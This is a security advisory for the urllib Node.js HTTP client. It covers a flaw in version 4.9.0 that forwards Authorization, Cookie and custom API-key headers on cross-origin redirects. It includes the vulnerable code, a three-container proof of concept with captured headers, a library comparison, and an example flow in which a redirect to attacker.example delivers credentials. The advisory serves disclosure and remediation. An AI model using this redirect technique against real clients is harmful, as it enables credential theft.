GHSA-hq3h-g68c-hp78: Infoleak

Published Aug 25, 2026
·
Updated

Summary

urllib supports redirect-following through followRedirect, which is expected behavior for an HTTP client. The issue is that, when following a redirect to a different origin, urllib preserves the caller-supplied request headers verbatim, including credential-bearing headers such as Authorization, Cookie, Proxy-Authorization, and custom auth headers (x-api-key, x-auth-token, x-access-token).

If the redirect target is attacker-controlled or outside the trust boundary of the original target, credentials intended for the original origin can be delivered to the redirected origin. In a local multi-library reproduction, urllib v4.9.0 was the only tested client that stripped no headers on cross-origin redirect.

Affected behavior

Confirmed against urllib v4.9.0. The relevant code is in #requestInternal (src/HttpClient.ts:639-656):

ts // https://developer.mozilla.org/en-US/docs/Web/HTTP/Redirections if (RedirectStatusCodes.includes(res.statusCode) && maxRedirects > 0 && requestContext.redirects < maxRedirects) { if (res.headers.location) { requestContext.redirects++; const nextUrl = new URL(res.headers.location, requestUrl.href); // Ensure the response is consumed await response.body.arrayBuffer(); debug( 'Request#%d got response, status: %s, headers: %j, timing: %j, redirect to %s', requestId, res.status, res.headers, res.timing, nextUrl.href, ); return await this.#requestInternal(nextUrl.href, options, requestContext); } }

The recursive call this.#requestInternal(nextUrl.href, options, requestContext) reuses the original options object. If the caller supplied credential-bearing headers in options.headers, those headers are reused for the redirected request, regardless of whether the redirect target shares the original origin.

Redirect-header handling context

The CHANGELOG suggests that redirect-related header handling has been considered before, including changes around preserving or cleaning up Host during redirects. Given that context, sensitive-header stripping may be an unintentional gap rather than an explicit policy decision.

Proof of Concept: 3-container topology

The reproduction uses three separate containers (partner, attacker, client) connected over a Podman bridge network. Each container has its own hostname, port, and process, so the redirect crosses a clear origin boundary. This is not a localhost vs 127.0.0.1 same-host case.

text [client container] [partner container] [attacker container] hostname: client hostname: partner hostname: attacker port: 3001 port: 3002 urllib v4.9.0 │ │ GET http://partner:3001/start │ + 6 credential-bearing headers ↓ 302 Location: http://attacker:3002/captured │ │ urllib follows redirect │ → DIFFERENT ORIGIN │ (different hostname and port) │ → all 6 headers preserved ↓ headers logged inside attacker container

The origin tuple is (scheme, host, port):

- source origin: http://partner:3001 - destination origin: http://attacker:3002

The host and port both differ, so the redirect target is a different URL origin. The headers are logged in a separate process inside a separate container.

Client invocation (client/poc.mjs):

javascript import urllib from 'urllib' // v4.9.0

await urllib.request('http://partner:3001/start', { followRedirect: true, maxRedirects: 5, headers: { 'Authorization': 'Bearer LIVE-AUTH-3CONTAINER', 'Cookie': 'session=LIVE-COOKIE-3CONTAINER', 'Proxy-Authorization': 'Bearer proxy-LIVE-3CONTAINER', 'x-api-key': 'sk-LIVE-3CONTAINER-x123', 'x-auth-token': 'auth-LIVE-3CONTAINER-y456', 'x-access-token': 'access-LIVE-3CONTAINER-z789', }, })

Observed result urllib 4.9.0, Node.js 22.22.2, linux/arm64:

text [attacker] CAPTURED HEADERS: "authorization": "Bearer LIVE-AUTH-3CONTAINER" "cookie": "session=LIVE-COOKIE-3CONTAINER" "proxy-authorization": "Bearer proxy-LIVE-3CONTAINER" "x-api-key": "sk-LIVE-3CONTAINER-x123" "x-auth-token": "auth-LIVE-3CONTAINER-y456" "x-access-token": "access-LIVE-3CONTAINER-z789" "user-agent": "node-urllib/4.9.0 Node.js/22.22.2 (linux; arm64)"

LEAK RATE: 6/6

The user-agent value confirms that the redirected request was sent by urllib v4.9.0.

Independent reproduction: multi-library comparison

A separate local harness tested the same cross-origin redirect topology against multiple Node.js HTTP clients:

- same partner:3001 → attacker:3002 redirect; - same six credential-bearing headers; - same RFC 6454 origin boundary.

The results were deterministic across runs:

| Library | Leak rate | Headers stripped on cross-origin redirect | |---|---:|---| | undici 6.21.0 | 3/6 | authorization, cookie, proxy-authorization | | needle 3.5.0 | 3/6 | authorization, cookie, proxy-authorization | | node-fetch 3.3.2 | 4/6 | authorization, cookie | | superagent 10.3.0 | 4/6 | authorization, cookie | | @hapi/wreck 18.1.0 | 4/6 | authorization, cookie | | request 2.88.2 | 5/6 | authorization | | urllib 4.9.0 | 6/6 | none |

urllib was the only tested library that stripped no headers on cross-origin redirect. Custom auth headers such as x-api-key, x-auth-token, and x-access-token are an ecosystem-wide gap in this comparison. The urllib-specific issue is the absence of any strip step for standard credential-bearing headers such as Authorization, Cookie, and Proxy-Authorization.

The reproduction harness is small and can be shared if useful.

Impact

This affects Node.js applications that use urllib to make authenticated HTTP requests while allowing redirects to be followed automatically.

text 1. Application sends an authenticated request: GET https://api.partner.example/data Authorization: Bearer <token> Cookie: session=<session-id>

2. The partner endpoint, a compromised intermediary, or a misconfigured CDN returns: 302 Location: https://attacker.example/captured

3. urllib follows the redirect and sends the original Authorization and Cookie headers to attacker.example.

This exposes credentials to an origin that was not the intended recipient. Depending on the credential type and server-side validation, the leaked credentials may be reusable against the original partner API or related services.

This requires no user interaction. Realistic triggers include compromised partner subdomains, DNS hijacking, malicious partner endpoints during onboarding, internal services redirecting across trust boundaries, or an open redirect upstream of urllib's call site.

Affected Software

2 affected componentsFixes available
npm/urllib<=2.44.0
2.44.1
npm/urllib>=3.0.0<=4.9.0
4.9.1

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/urllib to a version that resolves this vulnerability.

    Fixed in 2.44.1
  2. Upgrade

    Upgrade npm/urllib to a version that resolves this vulnerability.

    Fixed in 4.9.1
  3. Configuration

    Avoid leaking caller-supplied credential-bearing headers on cross-origin redirects by disabling automatic redirect following (or only set `followRedirect: true` when the redirect target is within the same trust boundary/origin). The material shows `urllib` v4.9.0 with `followRedirect: true` preserved credential-bearing headers verbatim when redirecting to a different origin.

    urllib (Node.js HTTP client) followRedirect = true (or enable followRedirect only for trusted redirects)
  4. Compensating control

    Implement an allowlist/validation on redirect destinations so that redirects to attacker-controlled or untrusted origins are blocked or sanitized; otherwise credential-bearing headers like `Authorization`, `Cookie`, `Proxy-Authorization`, `x-api-key`, `x-auth-token`, and `x-access-token` may be forwarded to the redirected origin (cross-origin redirect handling preserves these headers in `urllib` v4.9.0).

Event History

Aug 25, 2026
Advisory Published
via GitHub·04:19 PM
Data Sourced
via GitHub·04:19 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What requests are exposed to credential leakage?

Requests that use urllib redirect following and include caller-supplied credential-bearing headers are exposed when a redirect crosses to a different origin. Examples named in the advisory include Authorization, Cookie, Proxy-Authorization, x-api-key, x-auth-token, and x-access-token.

2

What does an attacker need to exploit this issue?

An attacker needs a request containing sensitive caller-supplied headers to follow a redirect to an attacker-controlled origin or another origin outside the intended trust boundary. No authentication or user interaction is indicated by the supplied severity vector.

3

Is the affected behavior confirmed in a specific version?

The behavior is confirmed against urllib v4.9.0. In the cited multi-library reproduction, this was the only tested client that stripped no headers during a cross-origin redirect.

4

What mitigation is supported if patching cannot happen immediately?

Avoid following redirects for requests that carry credentials, or ensure redirects cannot lead outside the intended trust boundary. Do not send credential-bearing custom headers on requests where cross-origin redirects may be followed.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203